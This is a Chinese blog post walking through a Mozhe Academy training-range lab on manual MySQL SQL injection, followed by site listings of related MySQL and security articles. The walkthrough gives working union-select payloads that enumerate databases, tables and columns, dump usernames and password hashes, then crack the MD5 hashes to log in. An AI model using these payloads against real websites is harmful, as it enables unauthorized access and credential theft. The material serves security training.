墨者学院SQL注入

最新推荐文章于 2024-07-27 09:56:32 发布
最新推荐文章于 2024-07-27 09:56:32 发布
阅读量399 收藏 6
点赞数 4
文章标签: mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86440467/article/details/140678464
版权

一.SQL手工注入漏洞测试(MySQL数据库)

1.启动靶场后。打开停机维护通知

2.在地址栏进行SQL注入

I:注入判断:

进行布尔判断,添加语句and 1=1,页面显示正常,添加语句and 1=2,页面显示出错。

证明存在sql注入

II:使用order by判断列数:

添加语句order by 5,页面显示错误,添加语句order by 4,页面显示正常,得判断页面为4列 

III:查询页面回显点:

使用联合查询,添加语句union select 1,2,3,4(判断为4列,故到4),并将id数字改为负值,使得显示为查询列数信息,得回显点为2和3

IV:查询信息:

将其中一个回显点改为要查询的数据:首先查询当前数据库,将2替换为database()

语句为union select 1,database(),3,4,得到当前数据库名

查询表名:还是在2的位置替换为group_concat(table_name),因表可能不止一个用group_concat()将数据组合显示,将from等语句放在最后一列后面,也可以都写在2的位置,但需要添加select并且将语句加上括号

语句为union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 

 查询列名,notice为通知,先查前面的表

语句为union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member'

根据列查询信息:group_concat中添加'~',意为用~将数据隔开

语句为union select 1,group_concat('~',id,'~',name,'~',password,status),3,4 from StormGroup_member

3.解密登录:

由题意得密码为MD5加密,在网站http://www.somd5.com解密两个密码得

返回页面登录用mozhe作为用户登录

第一个账户被禁用,第二个登录成功得到key

Jhin-Askeladd
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据库安全MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2614
MySQL基线检查,基线配置,安全加固
mysql的主从复制和读写分离
Hai990218的博客
07-24 1545
介于异步和全同步之间,主库更新完事务之后,也是同步到从库,同步完成之后有一个等待时间,等待时间是一个tcp/ip的往返时间,一般都是5毫秒左右。mysql的默认模式:主库在更新完事务之后会立即吧结果返回给从服务器,并不关心从库是否接收到,以及从库是否处理成功。控制innodb缓冲池的大小,增大可以提高数据库的性能,但是占用的是系统内存,配置的时候要注意合理化使用。从库配置更好的硬件,提升随机写的性能。实现是基于mysql的二进制日志,根据主库的二进制文件的标志位,实现主和从的同步。
mysql高阶语句
qq_59169480的博客
07-24 637
高级语法的查询语句。
MySQL常见指令
weixin_47755728的博客
07-23 471
如数值类型包括整数类型和浮点数类型 整数类型根据占用的存储空间的不同 又包括TINYINT(1字节),SMALLINT(2字节),INT(4字节),BIGINT(8字节),可以存储不同范围的整数。浮点数类型包括FLOAT(4字节)和DOUBLE(8字节),可以存储不同范围的浮点数。日期和时间类型包括DATE日期, TIME时间, DATETIME日期时间, TIMESTAMP时间戳。格式 : grant select on 数据库 .* to 用户名@登录主机 identified by ”密码"
MySQL:送分or送命 varchar(30) 与 int(10)
在那一刻,我们或许会发现自己站在了时间的另一岸,以更加成熟和宽广的胸怀,去拥抱那份隔代相传的深情。
07-24 1283
显示宽度并不限制字段中能够存储的值的范围或精度,而是指定了某些SQL客户端工具或应用程序在显示该字段的值时可能会使用的最小字符宽度。然而,这个特性并不是所有客户端或应用程序都会遵循的,它更多是一种建议或提示。用于存储最多30个字符的可变长度字符串。INT(10)用于存储整数值,括号中的10主要是一个显示宽度的提示,对存储的整数值没有实际影响。在设计数据库表时,应该根据实际需要选择合适的字段类型和长度,而不是过分关注显示宽度的概念。
Mysql的索引
2401_84592402的博客
07-24 671
索引是一个排序的列表,在列表当中存储索引的值以及索引对应数据所在的物理行索引值和数据是一个映射关系。
MySQL流量分析
qq_69100706的博客
07-24 573
MySQL流量分析通常指的是对MySQL数据库服务器的网络通信流量进行监测和分析,以了解数据交换的模式、性能瓶颈、安全性问题及潜在的优化机会。通过综合使用这些工具和技术,可以深入了解MySQL数据库的运行状况,及时发现和解决问题,优化数据库性能,保障数据安全
Mysql高阶语句
2401_84592402的博客
07-24 442
去重查询 : distinct。
mysql中where与on区别
m0_63227888的博客
07-24 537
使用ON子句来定义表之间的连接条件。使用WHERE子句来过滤查询结果,或者作为连接后结果的进一步筛选条件。在进行表连接时,应优先使用ON子句来指定连接条件,因为这样可以提高查询效率,避免不必要的全表扫描或笛卡尔积。WHERE子句在连接操作后使用,用于过滤连接后的结果集。
[MySQL][访问 -- 使用C API连接]详细讲解
SnowK博客
07-24 4714
[MySQL][访问 -- 使用C API连接]详细讲解
windows wsl ubuntu系统安装桌面可视化
weixin_42357472的博客
07-25 502
1)首先先安装好wsl ubuntu系统。启动报错sudo startxfce4。2)安装 Ubuntu 桌面版。桌面可以看到,但是背景是透明的。
【Spring Framework】MySQL 数据库连接配置
u013675821的博客
07-26 972
XML 配置:适用于传统项目,使用 XML 文件配置数据源和 JdbcTemplate。Java 注解配置:更现代化的方法,使用 Java 配置类来定义数据源和 JdbcTemplate。Spring Boot 自动配置:最简便的方式,利用 Spring Boot 的自动配置功能,通过配置文件定义数据库连接。每种方式都有其适用的场景,选择合适的配置方式可以提高开发效率和代码可维护性。通常,现代应用程序会倾向于使用 Spring Boot 的自动配置以简化开发流程。
Linux中MySQL 双主复制(互为主从)配置指南(详细过程)!
博客之路,前途漫漫
07-26 717
在数据驱动的时代,数据库的高可用性和数据一致性是每个企业必须考虑的重要问题。MySQL 双主复制(Master-Master Replication)提供了一种有效的解决方案,通过配置两台服务器互为主从,保证数据的实时同步和高可用性。本文将详细介绍如何配置基于 GTID 的 MySQL 双主复制,并进行测试验证。通过以上配置和测试,我们成功地实现了 MySQL 双主复制。此配置不仅提高了数据库的可用性,还确保了数据的一致性。在实际生产环境中,这种配置可以极大地减少数据丢失的风险,提升系统的容灾能力。
Mysql重大更新,三个版本遭下架!
xiaofan23z的专栏
07-24 427
个时就会触发这个重大bug,7/23日mysql发布重要更新,发布了如下三个版本。书接上文,7/11日开源数据库软件服务商percona发布重要警告,最新的。后面官方确认,确实存在重大bug,但是不是表超过10000个,而是超过。当mysql表超过10000张时重启可能会崩溃。
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1793
“微软蓝屏”事件暴露了网络安全哪些问题
OWASP ZAP:一款功能强大的开源Web安全扫描工具
最新发布
Coder加油站的专栏
07-27 817
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
网络安全相关竞赛比赛
黑战士的博客
07-18 1255
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 621
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 425
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,攻击者通过不断尝试不同的条件,观察页面返回的结果来推断出数据库的信息。攻击者可以使用布尔逻辑运算符(如AND、OR)和条件语句(如等于、小于、大于等)来构造恶意的SQL查询。 为了防止SQL注入布尔攻击,开发人员应该采取以下预防措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只接受合法的输入。 2. 参数化查询:使用参数化查询或预编译语句来构建SQL查询,这样可以将用户输入作为参数传递给查询,而不是直接拼接在SQL语句中。 3. 最小权限原则:为数据库用户分配最小权限,避免给予不必要的数据库操作权限。 4. 错误消息保护:在生产环境中,不要将详细的错误消息返回给用户,以免泄露敏感信息。 希望这能帮到你!如果有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值